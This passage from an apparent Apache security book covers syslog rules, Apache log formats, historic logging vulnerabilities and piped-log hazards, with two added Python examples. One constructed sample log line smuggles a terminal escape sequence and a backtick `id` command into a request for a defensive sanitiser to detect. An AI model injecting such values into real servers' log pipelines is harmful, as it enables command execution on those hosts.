• uucp—Tracks Unix-to-Unix Copy subsystem messages.

You can specify blanket logging using only the facility and no priority. For
example, here's a rule that specifies that the system should send all kernel messages
to the console:

kern.*                                   /dev/console

Here, the facility is kern (the kernel) and the action is to log to /dev/console. Or, if
you wanted to log all kernel messages to /var/log/messages, you could establish a
rule like this:

kern.*                                   /var/log/messages

The second half of the Selector field is the priority, which is not necessary
unless you want to refine your output. The priority must be one of these:

• alert—Indicates serious malfunctions that demand immediate attention.
• crit—(Critical) messages indicating fatal problems.
• debug—These messages provide debugging information on running processes.
• emerg—(Emergency) messages indicate emergency conditions.
• err—(Error) messages consist of typical STDERR.
• info—(Informational messages) report noncritical information, such as
  informing you when a service starts.
• notice—These messages are standard messages.
• warning—These messages are standard warnings (for example, the system or
  resource couldn't perform the requested task).

For example, if you wanted to log error messages from your news system, you might
create a rule like this:

# Save news errors of level err and higher
# in a special file.
news.err                                 /var/log/spooler

Here, your values are as follows:

• Your facility = news
• Your priority = err (error messages)
• Your action—log these to /var/log/spooler

In the action field, you specify what syslog should do with the messages you've
asked for. As seen previously, one possible choice is to log the messages to a
particular file. Other choices include the following:

• Named pipes
• The terminal or console
• A remote machine (if it's running syslogd)
• Specified users
• All users

For example, suppose you wanted to send your kernel messages to the remote host
linux3 (running syslogd). You might create a rule like this:

kern.*                                   @linux3
Or, perhaps you want to send all alerts to user support. You could create a rule like
this:

*.alert                                  support

The sample syslog.conf file provided with Linux offers several prefabricated
possibilities:

[root@linux6 conf]# more /etc/syslog.conf

# Log all kernel messages to the console.
# Logging much else clutters up the screen.
#kern.*                                  /dev/console

# Log everything (except mail and news) of level info or higher.
# Hmm--also don't log private authentication messages here!
*.info;news,mail,authpriv,auth.none      -/var/log/messages

# Log debugging too
#*.debug;news,mail,authpriv,auth.none    -/var/log/debug

# The authpriv file has restricted access.
authpriv.*;auth.*                        /var/log/secure
# true, 'auth' in the two previous rules is deprecated,
# but nonetheless still in use...

# Log all the mail messages in one place.
mail.*                                   /var/log/mail

# As long as innd insists on blocking /var/log/news
# (instead of using /var/log/news.d) we fall back to ...
news.*                                   /var/log/news.all

# Save uucp and news errors of level err and higher
# in a special file.
uucp,news.err                            /var/log/spooler

# Everybody gets emergency messages, plus log them on
# another machine.
*.emerg                                  *
#*.emerg                                 @loghost
If you plan on building a large network, I recommend logging to both local and
remote locations. This will ensure some level of redundancy. (It's always a good idea
to have several copies. You never know when disaster might strike, and an intruder
who gains root on the Web host can only edit the copy that lives there.)
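To check where a given message actually lands under a set of rules like the ones above, here is an added example in Python. It is not code from the book, from sysklogd, or from Apache; it implements the selector semantics just described: facility.priority selects that priority and everything more severe, * matches every facility or priority, none drops a facility from a selector, comma-joined facilities share one priority, semicolon-joined selectors are applied left to right with later ones overriding earlier ones, and a leading - on the action only suppresses syncing. The facility and priority names are the ones sysklogd knows; the configuration text inside the block is a constructed copy of the sample above with the kern.* and *.alert rules from the text added. It also handles the = prefix for exact-priority matching, which the sample does not use.

```python
"""Route (facility, priority) pairs through sysklogd-style syslog.conf rules.

Added example, not code from the book, sysklogd, or Apache. It answers
"where does this message land?" for the selector semantics described above.
"""
import re

# Ordered from most to least severe; syslog numbers emerg as 0 and debug as 7.
PRIORITIES = ["emerg", "alert", "crit", "err", "warning", "notice", "info", "debug"]
FACILITIES = ["auth", "authpriv", "cron", "daemon", "kern", "lpr", "mail", "mark",
              "news", "syslog", "user", "uucp"] + ["local%d" % i for i in range(8)]
ALIASES = {"panic": "emerg", "error": "err", "warn": "warning", "security": "auth"}


def _priority_mask(spec):
    """Translate a priority spec ('err', '=err', '*', 'none') into the set of
    priority indexes it selects."""
    if spec == "none":
        return set()
    exact = spec.startswith("=")
    name = spec.lstrip("=")
    name = ALIASES.get(name, name)
    if name == "*":
        return set(range(len(PRIORITIES)))
    level = PRIORITIES.index(name)  # ValueError on an unknown priority
    # "err and higher" means err plus everything more severe, i.e. indexes 0..level
    return {level} if exact else set(range(level + 1))


def parse_rule(line):
    """Parse one rule line into ({facility: set_of_priority_indexes}, action)."""
    selectors, action = re.split(r"\s+", line.strip(), maxsplit=1)
    mask = {facility: set() for facility in FACILITIES}
    for selector in selectors.split(";"):
        facilities, priority = selector.rsplit(".", 1)
        for facility in facilities.split(","):
            targets = FACILITIES if facility == "*" else [ALIASES.get(facility, facility)]
            for target in targets:
                if target not in mask:
                    raise ValueError("unknown facility %r" % target)
                # A later selector on the same line replaces an earlier one; that is
                # how '*.info;mail.none' keeps mail out of the file.
                mask[target] = _priority_mask(priority)
    # A leading '-' only asks syslogd not to sync the file after every write.
    return mask, action.lstrip("-")


def parse_config(text):
    """Parse a whole syslog.conf, skipping comments and blank lines."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            rules.append(parse_rule(line))
    return rules


def route(rules, facility, priority):
    """Return the actions, in file order, that receive a facility.priority message."""
    facility = ALIASES.get(facility, facility)
    level = PRIORITIES.index(ALIASES.get(priority, priority))
    return [action for mask, action in rules if level in mask[facility]]


# Constructed copy of the sample configuration above, plus the two rules from the text.
SAMPLE_CONF = """
#kern.*                                  /dev/console
*.info;news,mail,authpriv,auth.none      -/var/log/messages
authpriv.*;auth.*                        /var/log/secure
mail.*                                   /var/log/mail
news.*                                   /var/log/news.all
uucp,news.err                            /var/log/spooler
*.emerg                                  *
#*.emerg                                 @loghost
kern.*                                   @linux3
*.alert                                  support
"""

if __name__ == "__main__":
    rules = parse_config(SAMPLE_CONF)
    for facility, priority in [("auth", "info"), ("kern", "crit"), ("news", "err"),
                               ("user", "debug"), ("mail", "debug")]:
        print("%s.%s -> %s" % (facility, priority,
                               route(rules, facility, priority) or "dropped"))
```

Run it with no arguments to see the routing for a handful of messages; the interesting cases are auth.info, which the first rule excludes and the authpriv.*;auth.* rule catches, and user.debug, which no rule in the sample wants at all.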


NOTE

Using syslog has pros and cons. Certainly, you can send logs elsewhere, and even to a differ-
ent volume or box. This is useful in that you can centralize your logs, perhaps even from
several Web hosts to a single, unified log server. However, this complicates the parsing of log
data when using prefabricated tools for this purpose (chiefly because syslog prefixes every
line with its own timestamp, hostname, and program tag, so the lines no longer match the
native Apache log layout those tools expect). Also, when you write programs or scripts to
analyze Apache log data, you must take these issues into account. And finally, troubles can
arise if your Web server remains up but your log server goes down. If attackers target your log
server and kill it, they can bang away at your Web box with impunity, knowing you won't
have any logs to substantiate your claims. Keeping a local copy as well, as recommended
above, is the usual hedge.





LogLevel
LogLevel sets the lowest severity that Apache writes to error_log; anything less severe
is discarded. The syntax is

LogLevel level

level here is one of the levels specified in Table 9.5, listed there alphabetically. In
order of decreasing severity they are emerg, alert, crit, error, warn, notice, info, and
debug; the default is warn, and choosing a level logs it and every level above it.

TABLE 9.5 LogLevel Log Levels

Level    Description
alert    This logs events that demand immediate attention.
crit     This logs critical conditions, such as socket failures.
debug    This logs debug-level messages, and is most useful when you're trying to isolate
         unexpected or undesirable behavior that stems from inside Apache.
emerg    This logs emergencies. Apache is unusable at this point.
error    This logs error conditions, such as when a script's headers trail off unexpectedly.
info     This logs information messages.
notice   This logs normal conditions that are logged as a matter of course.
warn     This logs warning conditions, such as when a process doesn't die even though
         Apache tried to kill it.





Customizing httpd Logs
Apache allows you to customize your logs with the LogFormat directive. Here's the
default:

LogFormat "%h %l %u %t \"%r\" %s %b"

This indicates that by default, Apache logs the following:

• The remote host address

• The remote logname (unreliable, and available only if the client box is running
  ident and IdentityCheck is on)

• The remote user (unreliable also: the client supplies it, and Apache records
  whatever was offered even when authentication fails)

• The time the request was received, in the form
  [day/month/year:hour:minute:second zone], for example [01/Jan/2001:13:10:06 -0500]

• The client's request line (method, URL, and protocol)

• The status returned to the client

• The bytes sent, excluding headers

Table 9.6 summarizes LogFormat directives.





TABLE 9.6 httpd LogFormat Directives

Directive    What It Does
%{VAR}e      The %e directive records the contents of the named environment variable VAR.
%b           The %b directive records the total number of bytes sent (not including
             headers).
%f           The %f directive records the filename requested.
%h           The %h directive records the remote host's address.
%l           The %l directive records the logname (username) of the client's user (if they're
             running ident).
%P           The %P directive records the PID of the process that satisfied the client's
             request.
%p           The %p directive records the canonical port of the server that served the request.
%r           The %r directive records the first line of the client's request.
%s           The %s directive records the status of the client's request (%>s records the
             final status, after any internal redirect).
%t           The %t directive records the time of the request.
%T           The %T directive records the time taken to satisfy the client's request, in
             seconds.
%u           The %u directive records the remote user (using auth).
%U           The %U directive records the URL path that the client initially requested.
%v           The %v directive records the virtual host's hostname (its ServerName).





Some Security Caveats About Logs

By default, Apache locates its logs (at least on Unix) in directories that only root
can write and, in most installations, only root can read. If you change this—or change
the permissions those logs carry by default—you endanger your system and forfeit
any security benefit you gain from logs, for several reasons.

First, log files often contain very sensitive data. For example, they can contain proxy
and server configuration information. Second, they often contain usernames (when-
ever users access a password-protected area of your Web directory hierarchy), and
query strings carrying whatever the client put in them. Lastly, if anyone other than
the root, administrator, or operator can alter logs, they can destroy important
evidence of attacks.

Also note that while Apache's logging system is well resistant to local or remote
attack, third-party tools or modules—which developers expressly design and offer to
assist or extend Apache's logging capabilities—often themselves harbor vulnerabili-
ties. Last Lines is a good example.


On or about December 30, 2001, an independent researcher calling himself 
BrainRawt discovered holes in Last Lines. Last Lines CGI is a free, Perl-based CGI tool 
from Matrix’s Vault. It prints x number of lines from a specified log file to a specified 
Web page. 


Last Lines versions 1.3.17, 1.3.18, 1.3.19, 1.3.20, and 1.3.22 failed to filter metachar-
acters properly, and therefore allowed remote users to examine any Web-readable
directory. But that's not all. Because lastlines.cgi didn't perform proper filtering, it
allowed remote users to execute arbitrary commands sent through a Web browser,
with the privileges of the Web server. This, obviously, is a critical problem.


NOTE 


To learn more about the lastlines.cgi vulnerability, please see
http://www.securityfocus.com/archive/1/247710.





Sometimes, even Apache’s internal logging system can fall victim to holes. For 
example, on September 22, 2001, Daniel Matuschek reported that in versions 1.3.20 
and earlier, attackers could connect to a virtual host on an Apache system that uses 
split-logfile, and using a specially crafted URL that precedes the target address 
with a slash, overwrite or append to log files. In so doing, attackers can erase bona 
fide logs, or fabricate false log evidence. (The cure was to upgrade.) 


NOTE 


To learn more about the split-logfile vulnerability, please see
http://www.linuxsecurity.com/advisories/other_advisory-1645.html or
http://bugs.apache.org/index.cgi/full/7848.





The Apache logging system can even cause internal problems on rare occasion and
on exotic operating systems. For example, in January 2001, an independent
researcher found that on AIX, Apache 1.3.6 echoes a ws_read_domain_link error to
error_log. Reportedly, this error jammed all running instances of httpd, resulting in
resource starvation. One can only recover by restarting httpd, but it still returns to
its former behavior. (For this issue, see
http://bugs.apache.org/index.cgi/full/7092.)

Another such problem—which resulted in a denial-of-service attack—emerged when
an independent researcher in Australia identified a bug in 2.0.15 on Solaris 7, using
gcc 2.8.1. After 16 CGI requests, Apache looped into an error-reporting state and
rapidly filled the disk via error_log. This was a file descriptor leak and has since
been fixed. (See http://bugs.apache.org/index.cgi/full/7497.)


CAUTION

If you think you've found an error in Apache's logging system or related tools, please first
verify it before notifying Apache. Sometimes, users inadvertently misconfigure such facil-
ities and tools and then unfairly blame Apache for problems. For example, in June 2001,
what seemed like a bug actually wasn't. The originator reported that Apache (using
Apache::LogFile, TransferLog, and logrotate) was dumping access_log and error_log
output into the same file. The solution was to properly define separate entries for each
log, thus differentiating them. Doh! A similar issue arose when a Web administrator who
failed to use logrotate found that Apache log files on Linux, when exceeding 2 giga-
bytes, would cause Apache to crash (the 2GB ceiling is the 32-bit file size limit of the
libc and kernel of the day, not an Apache bug). This is, of course, what logrotate is for,
so remember to use it!





Piped Logs
Running Apache logs to default files (or even to syslog) is great, but perhaps you
want more incisive control over what and where Apache logs go, and what your
system does with them once written. If so, you might want to consider piping your
logs to another process. To do so, declare your desired log format under a nickname,
then give CustomLog the program you're piping to (prefixed with a pipe character)
followed by that nickname.

For LogFormat:

LogFormat "[ %v %{%Y %m %d}t ] %h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" program

or, for CustomLog:

CustomLog "| /path/to/parselog /path/to/logs" program

Here program is the format nickname declared by LogFormat, not the program being
run; the program is /path/to/parselog, which Apache starts once (as the user Apache
was started as, normally root) and feeds one log line per request on its standard input.


What should you pipe your logs to? That's hard to say. I've seen everything from
custom parsing engines to archiving utilities, to administrators sending their logs to
IRC. (Yes, IRC. It sounds ridiculous, but if you spend all your time on IRC—and you
want to watch your logs in real time—IRC might be an option. For an interesting
perspective on this in Java, see
http://www.javaworld.com/jw-10-2001/jw-10-cooltools.html.)
You'll find the piped logging structure in http_log.h, from lines 225 to 244:

typedef struct piped_log piped_log;

/**
 * The piped logging structure. Piped logs are
 * used to move functionality out of the main server.
 * For example, log rotation is done with piped logs.
 */
struct piped_log {
    /** The pool to use for the piped log */
    apr_pool_t *p;
    /** The pipe between the server and the logging process */
    apr_file_t *fds[2];
    /* XXX - an #ifdef that needs to be eliminated
     * from public view. Shouldn't be hard */
#ifdef AP_HAVE_RELIABLE_PIPED_LOGS
    /** The name of the program the logging process is running */
    char *program;
    /** The pid of the logging process */
    apr_proc_t *pid;
#endif
};


Apache opens the piped log process:

AP_DECLARE(piped_log *) ap_open_piped_log(apr_pool_t *p,
                                          const char *program);

The parameters here are

• p—The pool to allocate out of

• program—The program to run in the logging process

Eventually, Apache closes the piped process:

AP_DECLARE(void) ap_close_piped_log(piped_log *pl);

The parameter here is pl, the piped log structure. To read and write pl, Apache uses
ap_piped_log_read_fd(pl) and ap_piped_log_write_fd(pl).

One interesting element here is how Apache tracks the piped process. It associates
with the process (as you can see above) a PID for tracking purposes (apr_proc_t
*pid;) and registers it in the server's "other child" list, a linked list of processes that
are neither request-serving children nor foreign to the server. That list carries
sufficient information on each piped process to facilitate monitoring. Apache
traverses it to find and terminate (or otherwise maintain) piped processes.


CAUTION

Note that on Solaris (and some sh versions), piping can bring problems. For example,
when Apache pipes logs, a shell spawns with the -c option, and then comes the
command, which spawns yet another shell. Sometimes, when a HUP is sent, the root,
top-level Apache process receives it, but the piped children don't. This happens
despite the linked-list tracking described above. This is not a problem in bash or ksh.
Also note that on Win32, you must quote files, paths, parameters, and the external
script or program's name. Moreover, you must use the latest Apache release and
Windows NT 4.0 or better. Otherwise, Apache cannot spawn the shell necessary to
handle the piped log, and you'll receive an error like ap_spawn_child: Bad File
descriptor. Couldn't fork child for piped log process.





If Apache detects a problem with a child process, it might do one of several things.
Table 9.7 illustrates the various constants that can apply under such circumstances,
and what Apache will do.

TABLE 9.7 Constants Dealing with Children Relevant to Piping

Constant               Meaning
OC_REASON_DEATH        Apache discovers that a real child (not a server) dies and calls the
                       maintenance function to deal with it, passing the reason along.
OC_REASON_LOST         When Apache is about to restart and a child is neither obviously
                       alive nor dead, Apache cannot pass the maintenance function a
                       "normal" notification to justify killing processes (for example,
                       OC_REASON_DEATH or OC_REASON_RESTART). Apache then sends the
                       value of this constant.
OC_REASON_RESTART      When Apache restarts, it must kill all processes. It calls the
                       maintenance function (passing the value of this constant) to notify
                       that processes must die because it's restarting.
OC_REASON_UNREGISTER   When Apache calls ap_unregister_other_child() and then
                       removes the associated node from the linked list, it calls the
                       maintenance function.
OC_REASON_UNWRITABLE   Apache discovers through fds() that a node's fd variable is
                       unwritable, and thus calls the maintenance function.





From a security context, take care in what you pipe logs to. Logging pipes to
programs is only slightly less dangerous than assigning pipes in procmail or formail.
Unless you're well familiar with shell, Perl, awk, sed, or other programming, take
extreme care here. Shells and the aforementioned languages interpret metacharacters
and other symbols and words in special ways. You can easily understand the problem
by remembering these two points:

• Remote users can, to some extent, alter, customize, or craft the strings that
  Apache logs and sends to pipes. For example, in file requests, users can enter
  whatever they want—the strings they send need not make any sense. Their
  malformed structure will not prevent Apache from sending such strings along
  to piped processes. The same goes for the Referer and User-Agent headers, the
  username offered for Basic authentication, and (with HostnameLookups on) the
  reverse DNS name of the client.

• Your piped processes are bound to be shell scripts, Perl scripts, or other tools
  that take Apache's piped strings in (on standard input, and from there often as
  arguments to further commands, or stored in @ARGV for Perl, for example).
  Those strings, under certain circumstances, can trigger other shell utilities or
  commands—if you fail to embed the proper filters and tests within your script.


Indeed, as explained in Apache's documentation:

Anyone who can write to the directory where Apache is writing a log file can almost certainly
gain access to the uid that the server is started as, which is normally root. Do NOT give
people write access to the directory the logs are stored in without being aware of the conse-
quences; see the security tips document for details. In addition, log files may contain informa-
tion supplied directly by the client, without escaping. Therefore, it is possible for malicious
clients to insert control-characters in the log files, so care must be taken in dealing with raw
logs.


For pipes, this is even more of an issue. Hence, try to observe wise and careful coding
practices when designing homegrown programs that process piped logs. For more
information, see Chapter 12, "Hacking Secure Code: Apache at Server Side." A
hacking text file authored by Antifarmer, titled "Hacking Exposed" (not to be
confused with the excellent book that competes with the Maximum Security titles),
explains the security significance of piped logs and related issues. Find it at
http://www.subzion.com/security/text/rooting101.txt.
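As an added example that is not code from the book or from Apache, the following Python consumer ties together the default log layout described under Table 9.6 and the piped-log hazards just discussed. It parses "%h %l %u %t \"%r\" %>s %b" records, flags client-controlled fields that carry control bytes or shell metacharacters, and renders them inert before anything downstream sees them. The log lines inside it are constructed; the escape sequence in the third one is the kind of thing the quoted documentation warns about. The consumer never calls a shell, which is the point: a piped-log program should read its lines from standard input and keep every field as data.

```python
"""Parse Common Log Format lines and neutralise client-supplied bytes before
they reach a pipe, a shell, or a terminal.

Added example, not code from the book or from Apache. It assumes the
'%h %l %u %t \"%r\" %>s %b' layout discussed above; the sample lines
below are constructed for illustration.
"""
import re

CLF_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>.*)" (?P<status>\d{3}|-) (?P<bytes>\d+|-)$',
    re.DOTALL,
)
# Bytes a client can smuggle into the request line, the auth username, or
# a header, and which a terminal, a log viewer, or a downstream script may
# interpret rather than display.
CONTROL_RE = re.compile(r'[\x00-\x1f\x7f]')
# Characters that turn a log field into a command if a piped-log script
# interpolates it into sh -c, system(), backticks, or Perl's open("| ...").
SHELL_META = set(';|&$`<>()*?[]{}\'"\\\n')


def sanitize(field):
    """Render backslashes and control bytes visibly so the field is inert."""
    field = field.replace('\\', '\\\\')
    return CONTROL_RE.sub(lambda m: '\\x%02x' % ord(m.group()), field)


def parse_clf(line):
    """Return the fields of one CLF line as a dict, or None if it does not parse."""
    m = CLF_RE.match(line.rstrip('\r\n'))
    if m is None:
        return None
    rec = m.groupdict()
    rec['status'] = None if rec['status'] == '-' else int(rec['status'])
    rec['bytes'] = 0 if rec['bytes'] == '-' else int(rec['bytes'])
    # The request line should be "METHOD target PROTOCOL", but a client may send
    # fewer tokens; tolerate that rather than crash the logging process.
    parts = rec['request'].split(' ', 2)
    rec['method'], rec['target'], rec['protocol'] = (parts + ['', '', ''])[:3]
    return rec


def tainted_fields(rec):
    """Client-controlled fields carrying control bytes or shell metacharacters."""
    return [name for name in ('host', 'ident', 'user', 'request')
            if CONTROL_RE.search(rec[name]) or SHELL_META & set(rec[name])]


def consume(lines):
    """Digest piped log lines the way a safe log-pipe program should: parse,
    count, keep tainted records only in sanitized form, and never hand a raw
    field to a shell."""
    summary = {'parsed': 0, 'unparsed': 0, 'by_status': {}, 'tainted': []}
    for line in lines:
        rec = parse_clf(line)
        if rec is None:
            summary['unparsed'] += 1
            continue
        summary['parsed'] += 1
        summary['by_status'][rec['status']] = summary['by_status'].get(rec['status'], 0) + 1
        bad = tainted_fields(rec)
        if bad:
            summary['tainted'].append((rec['host'], bad, sanitize(rec['request'])))
    return summary


# Constructed sample: two ordinary hits, one request carrying a terminal-clearing
# escape sequence plus shell metacharacters, and one line that is not CLF at all.
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Oct/2001:13:55:36 -0700] "GET /index.html HTTP/1.0" 200 2326',
    '10.0.0.9 - alice [10/Oct/2001:13:56:01 -0700] "GET /private/report.pdf HTTP/1.1" 200 81920',
    '10.0.0.7 - - [10/Oct/2001:13:57:12 -0700] "GET /\x1b[2J\x1b[H;`id` HTTP/1.0" 404 209',
    'garbage that is not a log record',
]

if __name__ == '__main__':
    import sys
    # Under CustomLog "|/path/to/this.py" common, Apache feeds the lines on stdin.
    source = SAMPLE_LINES if sys.stdin.isatty() else sys.stdin
    print(consume(source))
```

The regex anchors both ends of the line, so an embedded quote in the request line (which Apache 1.3 writes unescaped) is still parsed correctly, and a record that does not match is counted rather than guessed at. Anything the consumer later passes to another program should go as an argument list, never through a shell, and only after sanitize() has been applied.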


NOTE

Did a bug ever arise in pipes on Apache? You bet, though in Apache's pipe handling
generally, not in log piping. Sometime in 2001, an independent researcher found that in
version 1.3.14, CGI scripts, compiled COM and EXE files, C programs, Fortran programs, and
even DOS batch files would run from a prompt but wouldn't execute through a client request.
The problem was limited to version 1.3.14 on Windows 95, and arose because pipes that
handled CGI streams neither opened nor closed correctly. The solution was to upgrade.

Considering the complexity of piped logs—especially in a security context—you
might consider other options. For example, suppose you are resorting to piped logs
merely to filter information from those logs (that is, you don't want certain strings
to appear therein). You needn't use piped logs. Instead, either customize your logs as
described previously, or use SetEnvIf.


The SetEnvIf Directive and Conditional Logging

The SetEnvIf directive defines environment variables based on attributes of the
request. Those attributes can be any HTTP request header field, including those defined
in RFC 2616, or one of a handful of special names described below. Table 9.8 lists the
RFC 2616 header fields and the category each belongs to; SetEnvIf examines only
headers the client sent, so the response header fields appear there for completeness.


TABLE 9.8 HTTP Header Fields

Header                 Type
Accept                 A request header field
Accept-Charset         A request header field
Accept-Encoding        A request header field
Accept-Language        A request header field
Accept-Ranges          A response header field
Age                    A response header field
Allow                  An entity header field
Authorization          A request header field
Cache-Control          A general header field
Connection             A general header field
Content-Encoding       An entity header field
Content-Language       An entity header field
Content-Length         An entity header field
Content-Location       An entity header field
Content-MD5            An entity header field
Content-Range          An entity header field
Content-Type           An entity header field
Date                   A general header field
ETag                   A response header field
Expect                 A request header field
Expires                An entity header field
extension-header       An entity header field
From                   A request header field
Host                   A request header field
If-Match               A request header field
If-Modified-Since      A request header field
If-None-Match          A request header field
If-Range               A request header field
If-Unmodified-Since    A request header field
Last-Modified          An entity header field
Location               A response header field
Max-Forwards           A request header field
Pragma                 A general header field
Proxy-Authenticate     A response header field
Proxy-Authorization    A request header field
Range                  A request header field
Referer                A request header field
Retry-After            A response header field
Server                 A response header field
TE                     A request header field
Trailer                A general header field
Transfer-Encoding      A general header field
Upgrade                A general header field
User-Agent             A request header field
Vary                   A response header field
Via                    A general header field
Warning                A general header field
WWW-Authenticate       A response header field





In addition to any request header field name (such as Host, Referer, or User-Agent),
SetEnvIf accepts the following special attributes:

• Remote_Addr—The client's IP address

• Remote_Host—The client's hostname (if available)

• Remote_User—The authenticated username (if available)

• Request_Method—The method type (GET, POST, PUT, and so on)

• Request_Protocol—The request's protocol name and version

• Request_URI—The URL (after the protocol and host portion)
The syntax is

SetEnvIf attribute regex envar[=value] [envar[=value]] ...

Here, attribute is a header name or one of the special attributes above, regex is the
regular expression to match against it, and each envar[=value] names an environment
variable to set (to value, or to 1 if no value is given; write !envar to unset it
instead). For example:

SetEnvIf Request_URI "\.gif$" object_is_image=gif

This sets object_is_image whenever a GIF file is requested. To keep GIF pickups out
of your main log and record them in a special log file just for GIF files instead, give
each CustomLog the matching env= condition:

CustomLog my-gif-request.log common env=object_is_image
CustomLog access_log common env=!object_is_image

Note that the variable named in CustomLog's env= (or env=!) clause and the envar set
by SetEnvIf must match. That is, they must be identical: env= names the variable
(object_is_image), not the value assigned to it (gif).


Other Interesting Apache-Related Logging Tools

The following list points to several unusual and useful Apache-related logging tools,
including

• mod_relocate

• mod_mylog

• mod_view

• mod_log_mysql

• parselog

• Apache-DBILogConfig

• Apache-DBILogger

• Apache-DebugInfo

• Apache-LogFile

• Apache-ParseLog

• Apache-Wombat

• Log-Dispatch

NOTE

Some of the URLs in this section are to direct downloads.





mod_relocate
Author: Brian Aker
E-mail: brian@tangent.org
URL: http://www.tangent.org/mod_relocate/
Version: 0.5

Description: Implements an easy way to log requests that leave the site. Also allows a
trigger to be called when this occurs.

mod_mylog
Author: Michael Link
E-mail: mlink@fractal.net
Requires: Apache 2.0, MySQL
URL: http://modmylog.sourceforge.net/
Version: 1.6

Description: Puts logs into a MySQL database. This enables you to perform deep analysis of
your logs with just a few lines of SQL code (as opposed to writing extensive lexical scanning
tools in Perl, sed, or awk).

mod_view
Author: Anthony Howe
E-mail: achowe@snert.com
Requires: N/A
URL: http://www.snert.com/Software/mod_view/
Version: 1.0

Description: Allows for the display of the head, tail, or entire contents of a static file. Ideal for
remotely viewing log files. As always, however, closely examine the code to determine that no
security holes exist (which could conceivably allow remote users to pull data from your logs,
or worse, from other plain text files containing sensitive data).

mod_log_mysql
Author: Chris Powell
E-mail: chris@grubbybaby.com
Requires: Apache
URL: http://www.grubbybaby.com/mod_log_mysql/
Version: 1.09

Description: Gives Apache the capability of logging access-log entries to a MySQL database.
Perfect for Web clusters and for SQL flexibility.
parselog
Author: Mark A. Bentley
E-mail: bentlema@cs.umn.edu
Requires: Perl5
URL: http://www.cs.umn.edu/~bentlema/projects
Version: 1.0beta

Description: This is a Perl script to parse and store logs by server and date.

Apache-DBILogConfig
Author: Jason Bodnar
E-mail: jason@shakabuku.org
Package Contents: Apache::DBILogConfig
URL: http://www.cpan.org/authors/id/J/JB/JBODNAR/Apache-DBILogConfig-0.02.tar.gz

Description: Logs access information in a DBI database.

Apache-DBILogger
Author: Ask Bjorn Hansen
E-mail: ask-cpan@perl.org
Package Contents: Apache::DBILogger
URL: http://www.cpan.org/authors/id/ABH/Apache-DBILogger-0.93.tar.gz

Description: Tracks what's being transferred in a DBI database.

Apache-DebugInfo
Author: Geoffrey Young
E-mail: geoff@cpan.org
Package Contents: Apache::DebugInfo
URL: http://www.cpan.org/authors/id/G/GE/GEOFF/Apache-DebugInfo-0.05.tar.gz

Description: Logs various bits of per-request data.
Apache-LogFile
Author: Doug MacEachern
E-mail: dougm@pobox.com
Package Contents: Apache::LogFile, Apache::LogFile::Config
URL: http://www.cpan.org/authors/id/DOUGM/Apache-LogFile-0.12.tar.gz

Description: Interface to Apache's logging routines.

Apache-ParseLog
Author: Akira Hangai
E-mail: akira@hangai.net
Package Contents: Apache::ParseLog
URL: http://www.cpan.org/authors/id/A/AK/AKIRA/Apache-ParseLog-1.02.tar.gz

Description: Object-oriented Perl extension for parsing Apache log files.

Apache-Wombat
Author: Brian Moseley
E-mail: ix@maz.org
Package Contents: Apache::Wombat
URL: http://www.cpan.org/authors/id/I/IX/IX/Apache-Wombat-0.5.1.tar.gz

Description: Embeds Wombat within an Apache/mod_perl server. Apache::Wombat::Connector—
Apache/mod_perl connector; Apache::Wombat::FileLogger—Apache file logger class;
Apache::Wombat::Logger—Apache server logger class; Apache::Wombat::Request—Apache
connector request class; Apache::Wombat::Response—Apache connector response class.

Log-Dispatch
Author: Dave Rolsky
E-mail: autarch@urth.org
Package Contents: Apache::Log objects.
URL: http://www.cpan.org/authors/id/D/DR/DROLSKY/Log-Dispatch-1.80.tar.gz


Other Interesting Logging Tools Not Specific to Apache 


Finally, this section covers several interesting and useful logging and audit tools that 
don’t ship with Apache, but are useful, especially on Unix. Table 9.9 lists them. 


TABLE 9.9 Tools to Enhance Your Logging Security

Tool            Description and Location
ippl            ippl is a multi-threaded tool that logs incoming IP packets. You can establish
                rules for which packet types you'd like to filter. Location:
                http://www.via.ecp.fr/~hugo/ippl/.
Logcheck        Logcheck is one component of the Abacus Project. Logcheck processes logs
                generated by the Abacus Project tools, system daemons, TCP Wrapper,
                logdaemon, and the TIS Firewall Toolkit. Location:
                http://www.psionic.com/abacus/logcheck/.
LogWatch        LogWatch analyzes your logs for a user-specified time period and generates
                customizable reports. Location:
                http://www.kaybee.org/~kirk/html/linux.html.
netlog          netlog is a collection of network monitoring and logging utilities
                (tcplogger, udplogger, netwatch, and extract). netlog can log all TCP
                connections and UDP sessions on a subnet and provide real-time monitoring
                and reporting. Location:
                http://net.tamu.edu/ftp/security/TAMU/netlog.README.
PIKT            PIKT is the Problem Informant/Killer Tool. PIKT monitors multiple
                workstations for problems, and if appropriate, automatically fixes those
                problems. Sample problems include disk failures, log failures, queue
                overflows, erroneous or suspicious permission changes, and so forth.
                Location: http://pikt.uchicago.edu/pikt/.
Secure Syslog   Secure Syslog is a new cryptographically secure system-logging tool.
                Designed to replace the syslog daemon, Secure Syslog implements a
                cryptographic protocol called PEO-1 that allows the remote auditing of
                system logs. Auditing remains possible even if an intruder gains superuser
                privileges in the system. Location:
                http://www.core-sdi.com/Core-SDI/english/slogging/ssyslog.html.





Also, there are several useful utilities that border on being both intrusion detec-
tion and log analysis systems, including the following:

• SWATCH (The System Watcher)

• Watcher

• NOCOL/NetConsole v4.0

• PingLogger

• LogSurfer

• Netlog

• Analog


SWATCH (The System Watcher) 
Author: Stephen E. Hansen and E. Todd Atkins 
Platform: Unix (Perl is required) 


Location: ftp://coast.cs.purdue.edu/pub/tools/unix/swatch/


The authors wrote SWATCH to supplement the logging capabilities of out-of-the-box 
Unix systems. SWATCH, consequently, has logging capabilities that far exceed your 
run-of-the-mill syslog. SWATCH provides real-time monitoring, logging, and report- 
ing. And, because SWATCH is written in Perl, it’s both portable and extensible. 


SWATCH has several unique features, including 


e A “backfinger” utility that attempts to grab finger information from the attack- 
ing host 


e Support for instant paging, so you can receive up-to-the-minute reports 


e Conditional execution of commands (if this condition is found in a log file, do 
this) 


Lastly, SWATCH relies on local configuration files. Conveniently, multiple configura- 
tion files can exist on the same machine. Therefore, although originally intended 
only for system administrators, any local user with adequate privileges can use 
SWATCH. 


Watcher
Author: Kenneth Ingham
E-mail: ingham@i-pi.com
URL: http://www.i-pi.com/

Ingham developed Watcher while at the University of New Mexico Computing
